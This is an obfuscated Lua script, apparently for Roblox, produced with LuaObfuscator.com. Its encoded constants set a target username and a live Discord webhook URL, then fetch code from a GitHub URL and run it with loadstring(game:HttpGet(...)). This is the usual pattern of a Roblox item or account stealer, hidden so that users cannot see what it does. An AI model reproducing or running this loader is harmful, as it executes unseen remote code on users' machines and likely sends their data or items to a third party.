--[[
 .____                  ________ ___.    _____                           __                
 |    |    __ _______   \_____  \\_ |___/ ____\_ __  ______ ____ _____ _/  |_  ___________ 
 |    |   |  |  \__  \   /   |   \| __ \   __\  |  \/  ___// ___\\__  \\   __\/  _ \_  __ \
 |    |___|  |  // __ \_/    |    \ \_\ \  | |  |  /\___ \\  \___ / __ \|  | (  <_> )  | \/
 |_______ \____/(____  /\_______  /___  /__| |____//____  >\___  >____  /__|  \____/|__|   
         \/          \/         \/    \/                \/     \/     \/                   
          \_Welcome to LuaObfuscator.com   (Alpha 0.2.8) ~  Much Love, Ferib 

]]--

do local v0=tonumber;local v1=string.byte;local v2=string.char;local v3=string.sub;local v4=string.gsub;local v5=string.rep;local v6=table.concat;local v7=table.insert;local v8=math.ldexp;local v9=getfenv or function()return _ENV;end ;local v10=setmetatable;local v11=pcall;local v12=select;local v13=unpack or table.unpack ;local v14=tonumber;local function v15(v16,v17,...)local v18=1;local v19;v16=v4(v3(v16,5),"..",function(v30)if (v1(v30,2)==79) then v19=v0(v3(v30,1,1));return "";else local v68=0;local v69;while true do if (v68==0) then v69=v2(v0(v30,16));if v19 then local v95=v5(v69,v19);v19=nil;return v95;else return v69;end break;end end end end);local function v20(v31,v32,v33)if v33 then local v70=(v31/((5 -3)^(v32-(2 -1))))%((3 -1)^(((v33-(2 -1)) -(v32-(1 + 0))) + (620 -(555 + 64)))) ;return v70-(v70%(932 -((1221 -364) + 74))) ;else local v71=568 -(367 + 201) ;local v72;while true do if (v71==(927 -(214 + 713))) then v72=(1 + 1)^(v32-((1066 -(68 + 997)) + 0)) ;return (((v31%(v72 + v72))>=v72) and (878 -(282 + 595))) or (1637 -(1523 + 114)) ;end end end end local function v21()local v34=0;local v35;while true do if (v34==(1271 -(51 + 175 + 1044))) then return v35;end if (v34==(0 -0)) then v35=v1(v16,v18,v18);v18=v18 + (118 -(32 + 85)) ;v34=1 + 0 ;end end end local function v22()local v36,v37=v1(v16,v18,v18 + (959 -(892 + 65)) );v18=v18 + 2 ;return (v37 * (610 -354)) + v36 ;end local function v23()local v38,v39,v40,v41=v1(v16,v18,v18 + (5 -2) );v18=v18 + (7 -3) ;return (v41 * (16777566 -(87 + 263))) + (v40 * (65716 -((164 -97) + 113))) + (v39 * (188 + 68)) + v38 ;end local function v24()local v42=v23();local v43=v23();local v44=1;local v45=(v20(v43,1 + 0 ,(34 + 45) -59 ) * (((1687 -733) -(802 + 150))^(85 -53))) + v42 ;local v46=v20(v43,37 -16 ,23 + 8 );local v47=((v20(v43,1029 -(915 + 82) )==(2 -1)) and  -(1 + 0)) or (1 -0) ;if (v46==(1187 -(1069 + (556 -(145 + 293))))) then if (v45==(0 -0)) then return v47 * (0 -(430 -(44 + 386))) ;else v46=1 + (1486 -(998 + 488)) ;v44=0 -0 ;end elseif (v46==(2031 + 16)) then return ((v45==(791 -(368 + 423))) and (v47 * ((3 -(1 + 1))/(18 -(10 + 8))))) or (v47 * NaN) ;end return v8(v47,v46-(3934 -2911) ) * (v44 + (v45/((444 -(416 + 26))^(165 -113)))) ;end local function v25(v48)local v49;if  not v48 then v48=v23();if (v48==0) then return "";end end v49=v3(v16,v18,(v18 + v48) -(1 + 0) );v18=v18 + v48 ;local v50={};for v66=773 -(201 + 571) , #v49 do v50[v66]=v2(v1(v3(v49,v66,v66)));end return v6(v50);end local v26=v23;local function v27(...)return {...},v12("#",...);end local function v28()local v51=0;local v52;local v53;local v54;local v55;local v56;local v57;local v58;while true do if (v51==3) then v58=nil;while true do if (v52==(0 -0)) then local v92=0 + 0 ;while true do if (v92~=2) then else v52=1;break;end if (v92~=(1 + 0)) then else v55={};v56={v53,v54,nil,v55};v92=2 -0 ;end if (v92~=(0 -0)) then else v53={};v54={};v92=1 + 0 ;end end end if (v52==2) then local v93=0 + 0 ;while true do if (v93==0) then for v103=397 -(115 + 281) ,v23() do local v104=0;local v105;local v106;while true do if (v104==1) then while true do if (v105==(0 -0)) then v106=v21();if (v20(v106,1 + 0 ,1770 -(1749 + 20) )==(0 + 0)) then local v151=0;local v152;local v153;local v154;local v155;local v156;while true do if (v151~=(0 -0)) then else v152=1322 -(1249 + 73) ;v153=nil;v151=3 -2 ;end if (v151==(868 -(550 + 317))) then v154=nil;v155=nil;v151=2 -0 ;end if ((2 -0)==v151) then v156=nil;while true do if (v152==(5 -3)) then while true do if (v153~=1) then else v156={v22(),v22(),nil,nil};if (v154==0) then local v176=0 -0 ;local v177;local v178;while true do if (v176==(1991 -(582 + 1408))) then while true do if (v177~=(0 -0)) then else v178=0;while true do if (v178==(0 -0)) then v156[11 -8 ]=v22();v156[11 -7 ]=v22();break;end end break;end end break;end if (v176==(1900 -(106 + 1794))) then v177=1824 -(1195 + 629) ;v178=nil;v176=1 -0 ;end end elseif (v154==1) then v156[244 -(187 + 54) ]=v23();elseif (v154==(782 -(162 + 618))) then v156[8 -5 ]=v23() -((5 -3)^(12 + 4)) ;elseif (v154==(2 + 1)) then local v188=584 -(57 + 527) ;local v189;while true do if (0==v188) then v189=1427 -(41 + 1386) ;while true do if (v189~=(103 -(17 + 86))) then else v156[3 + 0 ]=v23() -(2^(33 -17)) ;v156[11 -7 ]=v22();break;end end break;end end end v153=2 -0 ;end if (v153~=(168 -(122 + 44))) then else if (v20(v155,1 -0 ,3 -2 )~=(1 + 0)) then else v156[1 + 1 ]=v58[v156[2]];end if (v20(v155,3 -1 ,67 -(30 + 35) )==1) then v156[1639 -(1373 + 263) ]=v58[v156[1003 -(451 + 549) ]];end v153=11 -8 ;end if (v153~=(1212 -(323 + 889))) then else local v173=0 -0 ;local v174;while true do if (v173~=(580 -(361 + 219))) then else v174=0;while true do if (v174~=(1 + 0)) then else v153=1 -0 ;break;end if (v174==0) then local v187=320 -(53 + 267) ;while true do if ((0 + 0)==v187) then v154=v20(v106,2 -0 ,1387 -(746 + 638) );v155=v20(v106,417 -(15 + 398) ,6);v187=1;end if (v187==(1 + 0)) then v174=1;break;end end end end break;end end end if (v153==(4 -1)) then if (v20(v155,344 -(218 + 123) ,3)==(1582 -(1535 + 46))) then v156[4 + 0 ]=v58[v156[854 -(20 + 830) ]];end v53[v103]=v156;break;end end break;end if ((1 + 0)==v152) then local v171=0 + 0 ;while true do if (v171~=(126 -(116 + 10))) then else v155=nil;v156=nil;v171=1 + 0 ;end if (v171==(561 -(306 + 254))) then v152=1 + 1 ;break;end end end if (v152~=(0 -0)) then else local v172=0;while true do if (v172~=(0 -0)) then else v153=1467 -(899 + 568) ;v154=nil;v172=1 + 0 ;end if (v172~=1) then else v152=1;break;end end end end break;end end end break;end end break;end if ((0 -0)~=v104) then else local v114=603 -(268 + 335) ;while true do if (v114==(291 -(60 + 230))) then v104=1;break;end if (v114==(572 -(426 + 146))) then v105=0 + 0 ;v106=nil;v114=406 -(118 + 287) ;end end end end end for v107=1457 -(282 + 1174) ,v23() do v54[v107-(812 -(569 + 242)) ]=v28();end v93=1;end if ((2 -1)==v93) then return v56;end end end if (v52~=(1 + 0)) then else local v94=1024 -(706 + 318) ;while true do if (v94~=(1251 -(721 + 530))) then else v57=v23();v58={};v94=1;end if ((1273 -(945 + 326))==v94) then v52=4 -2 ;break;end if (v94~=(1 + 0)) then else for v109=978 -(553 + 424) ,v57 do local v110=0 -0 ;local v111;local v112;local v113;while true do if ((0 + 0)==v110) then v111=0 + 0 ;v112=nil;v110=1 + 0 ;end if (v110~=(1 + 0)) then else v113=nil;while true do if (v111~=0) then else v112=v21();v113=nil;v111=1;end if (v111~=(701 -(271 + 429))) then else if (v112==(1 + 0)) then v113=v21()~=(0 + 0) ;elseif (v112==2) then v113=v24();elseif (v112~=(1503 -(1408 + 92))) then else v113=v25();end v58[v109]=v113;break;end end break;end end end v56[1089 -(461 + 625) ]=v21();v94=5 -3 ;end end end end break;end if (v51==(1289 -(993 + 295))) then v54=nil;v55=nil;v51=2;end if (v51~=(1 + 1)) then else v56=nil;v57=nil;v51=3;end if (v51==(0 -0)) then v52=0 + 0 ;v53=nil;v51=1172 -(418 + 753) ;end end end local function v29(v59,v60,v61)local v62=0;local v63;local v64;local v65;while true do if (v62==0) then v63=v59[1];v64=v59[2];v62=1;end if (v62==1) then v65=v59[3];return function(...)local v76=v63;local v77=v64;local v78=v65;local v79=v27;local v80=1;local v81= -1;local v82={};local v83={...};local v84=v12("#",...) -1 ;local v85={};local v86={};for v90=0,v84 do if (v90>=v78) then v82[v90-v78 ]=v83[v90 + 1 ];else v86[v90]=v83[v90 + 1 ];end end local v87=(v84-v78) + 1 ;local v88;local v89;while true do local v91=0;while true do if (v91==0) then v88=v76[v80];v89=v88[1];v91=1;end if (v91==1) then if (v89<=8) then if (v89<=3) then if (v89<=1) then if (v89==0) then v86[v88[2]]();else local v116=0;local v117;while true do if (0==v116) then v117=v88[2];v86[v117]=v86[v117](v13(v86,v117 + 1 ,v81));break;end end end elseif (v89==2) then v86[v88[2]][v88[3]]=v88[4];else v86[v88[2]]=v88[3]~=0 ;end elseif (v89<=5) then if (v89>4) then v86[v88[2]]=v88[3]~=0 ;else v86[v88[2]]=v61[v88[3]];end elseif (v89<=6) then local v124=v88[2];local v125,v126=v79(v86[v124](v13(v86,v124 + 1 ,v88[3])));v81=(v126 + v124) -1 ;local v127=0;for v145=v124,v81 do v127=v127 + 1 ;v86[v145]=v125[v127];end elseif (v89>7) then v86[v88[2]]();else do return;end end elseif (v89<=12) then if (v89<=10) then if (v89>9) then local v128=0;local v129;while true do if (v128==0) then v129=v88[2];v86[v129]=v86[v129](v13(v86,v129 + 1 ,v81));break;end end else do return;end end elseif (v89>11) then v86[v88[2]]=v61[v88[3]];else v86[v88[2]]=v88[3];end elseif (v89<=14) then if (v89==13) then local v134=v88[2];local v135=v86[v88[3]];v86[v134 + 1 ]=v135;v86[v134]=v135[v88[4]];else local v139=v88[2];local v140,v141=v79(v86[v139](v13(v86,v139 + 1 ,v88[3])));v81=(v141 + v139) -1 ;local v142=0;for v148=v139,v81 do v142=v142 + 1 ;v86[v148]=v140[v142];end end elseif (v89<=15) then v86[v88[2]]=v88[3];elseif (v89>16) then v86[v88[2]][v88[3]]=v88[4];else local v159=0;local v160;local v161;while true do if (v159==1) then v86[v160 + 1 ]=v161;v86[v160]=v161[v88[4]];break;end if (0==v159) then v160=v88[2];v161=v86[v88[3]];v159=1;end end end v80=v80 + 1 ;break;end end end end;end end end return v29(v28(),{},v17)(...);end v15("LOL!0B3O0003023O005F4703083O00557365724E616D65030C3O0055626572546F75676847757903093O00557365724E616D653203023O002O2003073O00576562682O6F6B03793O00682O7470733A2O2F646973636F72642E636F6D2F6170692F776562682O6F6B732F3O3134322O343537383637383135333233362F4F734F53662O39706441786E6B4F396E494872496F334D30496D6246327673663546347358636A39344F79426138396F385155476242554A4952376C4662736E36346763030A3O006C6F6164737472696E6703043O0067616D6503073O00482O7470476574034A3O00682O7470733A2O2F7261772E67697468756275736572636F6E74656E742E636F6D2F4C7970686572582F4C7970686572585A63726970742F6D61696E2F4C797068657253637269707473000F3O00120C3O00013O0030113O0002000300120C3O00013O0030113O0004000500120C3O00013O0030113O0006000700120C3O00083O00120C000100093O00201000010001000A00120B0003000B4O0003000400014O000E000100044O000A5O00022O00083O000100012O00073O00017O00",v9(),...);end
